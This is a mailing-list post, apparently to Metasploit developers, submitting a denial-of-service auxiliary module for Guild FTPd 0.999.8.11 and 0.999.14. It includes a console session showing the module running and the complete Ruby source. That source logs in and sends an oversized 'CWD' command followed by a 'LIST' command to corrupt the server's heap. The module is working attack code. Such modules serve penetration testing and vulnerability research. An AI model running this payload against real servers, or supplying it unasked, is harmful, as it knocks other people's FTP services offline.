-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hey guys,
I've attached a new DoS auxiliary module for Guild FTPd versions 0.999.8.11 and 0.999.14. It's based on the Python script from yesterday which says it works for these versions, but I've only been able to test it on the latter. This module needs the patch I sent a few minutes ago fixing banner grabbing in Exploit::Remote::Ftp. msf > use dos/windows/ftp/guildftp_cwdlist msf auxiliary(guildftp_cwdlist) > set RHOST 192.168.10.2 RHOST => 192.168.10.2 msf auxiliary(guildftp_cwdlist) > set FTPUSER test FTPUSER => test msf auxiliary(guildftp_cwdlist) > set FTPPASS test FTPPASS => test msf auxiliary(guildftp_cwdlist) > run [*] Connecting to FTP server 192.168.10.2:21... [*] Connected to target FTP server. [*] Authenticating as test with password test... [*] Sending password... [*] Sending commands... [*] Auxiliary module execution completed msf auxiliary(guildftp_cwdlist) > info Name: Guild FTPd 0.999.8.11/0.999.14 Heap Corruption Version: 1 Provided by: Kris Katterjohn <[EMAIL PROTECTED]> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- FTPPASS test yes Valid FTP password for username FTPUSER test yes Valid FTP username RHOST 192.168.10.2 yes The target address RPORT 21 yes The target port Description: Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap corruption. You need to have a valid login so you can run CWD and LIST. Thanks, Kris Katterjohn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSPRBUP9K37xXYl36AQLsCg//WB/fVpEJez+Ox+dRp36vn2+nCGXatZMJ i4LKcYfFOB/jh0IU4AQgQv/hwmIUwNooHw2TMmaG6LL2wnO8Iw1Pvr9G4S4/XqB1 V6Eah1f1WXOPxAehCaIihC0FqLljtjOFeCqT56B4Gi2pKyfctUitzSy6+irPwX4G 7e27gf4E2JeU/3eGUOahIh0a1988uZCy6GBNe6AwoSPsSLwFn+m4z3BqiGJ4TNsI lll/AXToIytS7HpogGzcEuldU/EomOgH+YTTSWpL0DkPo/bhRW6fd02QzTqKmI+I /M1X2V4k5L2VMGsPG19MJ8STGfZOVMnqSIJPwwXtcOcwNXmJO8AQcNZaOKX98rw9 oWBVHGin2IZzfyW3oJwvlab3aMVMgoheQoHQqQwjbDel/dX5vCwzEWmjChBur6By JoS+K4BDIHdinb9B5lkKAPqWfRO3PtraIGk2mEuML+uKGCSHtts0nMqCW1p4+bPs MtCbeJRqsI4SIK1Yls0A45mVK4Nb6IK2wShI2cJtgpV4+LHtYRexjAlJMliwXMPp 2YZi2ngWm55pLioEosnTI82EVU5qZMTr9N6HJKuD0sjfOUwyao1DIAsFmQdZAssm wAr3D37g97YO9isNfXqkvWP1GU0wWTwKlxUW+wRlJ6osFZkyX5GvMx+UAsDpJgBI /PegfNjeIOM= =pHjH -----END PGP SIGNATURE-----
require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Guild FTPd 0.999.8.11/0.999.14 Heap Corruption', 'Description' => %q{ Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap corruption. You need to have a valid login so you can run CWD and LIST. }, 'Author' => 'Kris Katterjohn <[EMAIL PROTECTED]>', 'License' => MSF_LICENSE, 'Version' => '1', 'References' => [ [ 'URL', 'http://milw0rm.com/exploits/6738'] ], 'DisclosureDate' => 'Oct 12 2008')) # They're required register_options([ OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]), OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ]) ]) end def run connect_login print_status("Sending commands...") # We want to try to wait for responses to these raw_send_recv("CWD #{'/.' * 124}\r\n") raw_send_recv("LIST #{'X' * 100}\r\n") disconnect end end
_______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers